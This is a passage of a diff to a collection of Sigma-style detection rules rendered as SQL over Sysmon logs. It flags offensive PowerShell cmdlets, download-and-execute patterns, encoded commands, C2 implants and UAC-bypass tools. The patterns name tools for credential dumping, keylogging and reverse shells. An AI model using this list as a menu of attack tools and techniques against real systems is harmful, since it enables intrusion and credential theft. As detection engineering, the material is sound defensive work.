'\\' OR CommandLine LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE 
'%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADR%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRCSV%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRExcel%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRHTML%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRJSON%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRXML%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ADIDNS%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR 
CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE 
'\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE 
'%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE 
'%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%New-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_run_script_from_ads.yml" + "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" }, { - "title": "Suspicious Use of CSharp Interactive Console", - "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", + "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", + "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", "status": "test", - "description": "Detects the execution of CSharp 
interactive console by PowerShell", - "author": "Michael R. (@nahamike01)", + "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.execution", - "attack.t1127" + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." + "Legitimate administration activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csi_use_of_csharp_console.yml" + "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" }, { - "title": "Ps.exe Renamed SysInternals Tool", - "id": "18da1007-3f26-470f-875d-f77faf1cab31", - "status": "test", - "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - PowerTool Execution", + "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "status": "experimental", + "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload 
drivers, and delete the driver files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.g0035", - "attack.t1036.003", - "car.2013-05-009" + "attack.t1562.001" ], "falsepositives": [ - "Renamed SysInternals tool" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine = 'ps.exe -accepteula')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" ], - "filename": "proc_creation_win_apt_ta17_293a_ps.yml" + "filename": "proc_creation_win_hktl_powertool.yml" }, { - "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", - "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "title": "Disabled Volume Snapshots", + "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", "status": "test", - "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", - "author": "John Lambert (rule)", + "description": "Detects commands that temporarily turn off Volume Snapshots", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE 
'%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE 
'%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" + "filename": "proc_creation_win_reg_volsnap_disable.yml" }, { - "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", - "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "title": "HackTool - Sliver C2 Implant Activity Pattern", + "id": "42333b2c-b425-441c-b70e-99404a17170f", "status": "experimental", - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" 
+ "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Other legitimate network providers used and not filtred in this rule" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" ], - "filename": "proc_creation_win_registry_new_network_provider.yml" + "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" }, { - "title": "Suspicious File Download Using Office Application", - "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "title": "HackTool - ADCSPwn Execution", + "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", "status": "test", - "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", - "author": "Beyu Denis, oscd.community", + "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1557.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_office.yml" + "filename": "proc_creation_win_hktl_adcspwn.yml" }, { - "title": "HackTool - UACMe Akagi Execution", - "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "title": "PowerShell Web Download and Execution", + "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", "status": "experimental", - "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", - "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Scripts or tools that download files and execute them" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (Image LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE 
'\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_uacme.yml" + "filename": "proc_creation_win_powershell_download_iex.yml" }, { - "title": "WannaCry Ransomware Activity", - "id": "41d40bff-377a-43e2-8e1b-2e543069e079", - "status": "test", - "description": "Detects WannaCry ransomware activity", - "author": "Florian Roth (Nextron Systems), Tom U. 
@c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "title": "ImagingDevices Unusual Parent/Child Processes", + "id": "f11f2808-adb4-46c0-802a-8660db50fa99", + "status": "experimental", + "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "attack.discovery", - "attack.t1083", "attack.defense_evasion", - "attack.t1222.001", - "attack.impact", - "attack.t1486", - "attack.t1490" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR Image LIKE 